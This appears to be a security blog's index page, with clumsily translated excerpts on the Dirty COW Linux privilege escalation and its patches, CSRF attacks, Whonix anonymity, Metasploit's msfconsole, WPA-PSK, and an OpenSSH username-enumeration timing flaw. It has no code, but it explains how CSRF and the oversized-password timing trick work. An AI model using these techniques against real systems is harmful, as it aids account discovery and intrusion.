Linux kernel 9-year-old “dirty cow” 0-day vulnerability


This is called Dirty COW, is dirty cattle vulnerability exists in the Linux kernel has been up to nine years, also said the 2007 release of the Linux kernel version existed vulnerability. Linux kernel team has conducted a repair.

Vulnerability ID:


Vulnerability name:

Dirty COW

Sphere of influence

Linux kernel >= 2.6.22

Vulnerability Overview:
Specifically, the Linux kernel’s memory subsystem generates race conditions when dealing with copy-on-write (COW). A malicious user could exploit this vulnerability to gain high-level access to read-only memory-mapped writes. (A race condition was found in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings.)

Race conditions, which are exceptions to the order in which tasks are executed, can lead to application crashes, or allow an attacker to take advantage of further code execution. With this vulnerability, an attacker can raise privileges on their target system and may even gain root privileges.

According to the official release of the patch information, the problem can be traced back to the 2007 release of the Linux kernel. Now there is no evidence that after 2007 whether there is a hacker exploited this vulnerability. But security expert Phil Oester said he found an attacker to use the vulnerability to deploy the attack, and Red Hat informed of the recent attacks.

How to fix

Greg Kroah-Hartman, who maintains Linux kernel maintenance, fixes the maintenance update for the Linux 4.8, 4.7 and 4.4 LTS kernel families (updated with Linux kernel 4.8.3, 4.7.9, and 4.4.26 LTS) to fix the vulnerability. The newer versions are now available in the GNU / Linux distribution libraries, including Arch Linux (in beta), Solus, and all supported versions of Ubuntu. Debian developers also announced a stable version of the day before yesterday, Debian GNU / Linux 8 “Jessei” series kernel important update – this update fixes a total of four Linux kernel security vulnerabilities, including dirty cattle.

The operating system vendors should immediately download the Linux kernel 4.8.3, Linux kernel 4.7.9 and Linux kernel 4.4.26 LTS, to provide users with a stable version of the channel update.


Cross Site Request Forgery [CSRF-XSRF] Vulnerability.

Cross Site Request Forgery

Cross-site request forgery [CSRF], also known as one-click attack or session riding or Sea-Surf and abbreviated as CSRF or XSRF, is a type of malicious attack exploit of a website (“Web Application”); where unauthorized commands are transmitted from a user that the website trusts. The impact of a successful CSRF attack is limited to the capabilities exposed by the vulnerable application and based on the privileges of each victim. When targeting a normal user, a successful CSRF attack can compromise end-user data and their associated functions with the web app.

If the targeted end user is an Administrator Account (“Admin“); a CSRF attack can compromise the entire WEB Application. Sites that are more likely to be attacked by CSRF are Community websites : Social Networking Sites, Email providers and Forums.
Or sites that have high accounts associated with them such as Banks and Stocks.

Utilizing Social Engineering (“S_E”); an Attacker (“Pentester/Hacker”) can embed malicious HTML or JavaScript code into an EMAIL or WebSite to request a specific TASK URL. The task then executes with or without the user’s knowledge, either directly or by utilizing a Cross-Site Scripting flaw.

CSRF attacks include a malicious exploit of a website in which a user will transmit malicious requests that the target website trusts without the user’s consent.
In Cross Site Scripting (“XSS”); the attacker exploits the trust a user has for a website, with CSRF on the other hand, the attacker exploits the trust a website has against a user’s browser.

Basically, an attacker will use CSRF to trick a victim into accessing a website or clicking a URL link that contains malicious or unauthorized requests (“Using here some of the Greatest Social Engineering tips/tricks”).

Upon a request against most websites, browsers will include along any credentials related with the particular website, such as the Session Cookie of the user, basic authentication credentials, the IP address of the user…
Thus, if user’s authentication session is still valid, an attacker can use CSRF to launch any desired requests against the website, without the website being able to distinguish whether the requests are legitimate or not.

And to get the full idea of CSRF vulns, here is simple example on a simple Picture:

CSRF Simple Example

Thanks for reading our article, i hope that you find it useful, please share it with you’re friends and Thanks.

Maximum anonymity yourself: Whonix and Kali Linux 2016.2

The need for anonymous surfing today is imminent.  The privacy is being stolen from us and most of all Internet users are far from cybercriminals.  Today we ‘ll show you how to maximum anonymity yourself on the Internet using Whonix and Kali Linux 2016.2.

What is Whonix?

Whonix is an operating system focused on anonymity , the privacy and security . TOR uses as a basis for connections and Debian as operating system. Ensure that the DNS leak is impossible and that even a malware installed on the computer with root privileges can find out the real ip.

Continue reading

Metasploit Framework for Penetration Tester

The msfconsole is probably the most popular interface to the Metasploit Framework (MSF). It provides an “all-in-one” centralized console and allows you efficient access to virtually all of the options available in the MSF. Msfconsole may seem intimidating at first, but once you learn the syntax of the commands you will learn to appreciate the power of utilizing this interface.

With msfconsole, you can access and use all Metasploit plug-ins, payloads, the use exploit modules, post module and so on. MSFCONSOLE interface can integrate to third-party programs as well, such as nmap, sqlmap, etc., can be used directly in msfconsole inside.

Continue reading

Attacking WPA-PSK

WPA / WPA2 Introduction 

It’s probably apparent by now that WEP needed to be replaced.  To accomplish this the Wi-Fi Alliance came up with a new standard called IEEE 802.11i – Wi-Fi Protected Access.  WPA is actually based on the draft version of 802.11i and does not implement all the features of the standard.  WPA was intended to be a quick fix for WEP, whilst the full implementation of 802.11i – WPA2 was developed.
Continue reading

CVE-2016-6210: OpenSSH – user enumeration

1.Sphere of influence

OpenSSH <=OpenSSH 7.2p2

2.Descriptions of the vulnerability

When we use the user name does not exist to connect ssh server, SSHD will be based BLOWFISH algorithm to generate a fake password, but if the user name exists, SSHD uses a SHA256 / SHA512 algorithm to encrypt the password. So we sent a large password (> 10KB), SHA256 algorithm to calculate time much longer than the BLOWFISH algorithm fake password. So based on this principle, we can enumerate ssh username.

Continue reading